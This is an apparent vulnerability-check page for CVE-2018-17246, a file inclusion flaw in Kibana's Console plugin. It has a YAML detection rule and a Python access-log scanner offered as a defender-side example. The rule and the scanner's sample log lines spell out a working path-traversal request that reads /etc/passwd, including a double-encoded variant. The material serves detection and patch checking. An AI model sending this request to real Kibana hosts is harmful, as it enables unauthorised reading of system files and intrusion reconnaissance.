Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
PoC code [public]
id: CVE-2018-17246

info:
  name: Kibana Local File Inclusion
  author: canc3s
  severity: high
  verified: true
  description: |-
    Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17246
    - https://www.exploit-db.com/exploits/46233
  tags: cve,cve2018,kibana,lfi
  created: 2023/08/10

rules:
  r0:
    request:
      method: GET
      path: /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
    expression: response.headers["kbn-name"] == "kibana" && response.content_type.contains("application/json") && response.body.bcontains(bytes("\"statusCode\":500")) && response.body.bcontains(bytes("\"message\":\"An internal server error occurred\""))
expression: r0()
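
A defender-side check for the request pattern used by the rule above, as an added example that is not part of the original PoC or of Kibana: it scans access logs for Console API requests whose `apis` parameter leaves the expected directory, including percent-encoded and double-encoded traversal. The common log format (for example from a reverse proxy in front of Kibana), the comma-separated handling of `apis`, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

CONSOLE_PATH = "/api/console/api_server"  # endpoint taken from the PoC on this page
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) a bounded number of times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_apis(target):
    """Return the `apis` entries in a request target that are absolute or contain '..'."""
    url = urlsplit(target)
    if not url.path.rstrip("/").endswith(CONSOLE_PATH):  # tolerate a base-path prefix
        return []
    hits = []
    for raw in parse_qs(url.query, keep_blank_values=True).get("apis", []):
        # Assumption: the value is a comma-separated list of API names.
        for name in fully_decode(raw).replace("\\", "/").split(","):
            if name.startswith("/") or ".." in name.split("/"):
                hits.append(name)
    return hits

def scan(lines):
    """Return (line_number, offending_values) for each flagged access-log line."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hits = suspicious_apis(m.group("target")) if m else []
        if hits:
            findings.append((n, hits))
    return findings

# Constructed sample lines in common log format (not taken from a real system).
SAMPLE = [
    '10.0.0.5 - - [10/Aug/2023:10:00:00 +0000] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=es_6_0 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Aug/2023:10:00:05 +0000] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 500 77',
    '10.0.0.9 - - [10/Aug/2023:10:00:09 +0000] "GET /kibana/api/console/api_server?apis=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 500 77',
    '10.0.0.7 - - [10/Aug/2023:10:01:00 +0000] "GET /app/kibana?apis=../x HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE):
        print(f"line {n}: traversal in apis parameter -> {hits}")
```

A flagged request answered with status 500 matches what the rule's expression looks for; hosts showing such entries should be checked against the fixed releases named above (6.4.3 and 5.6.13).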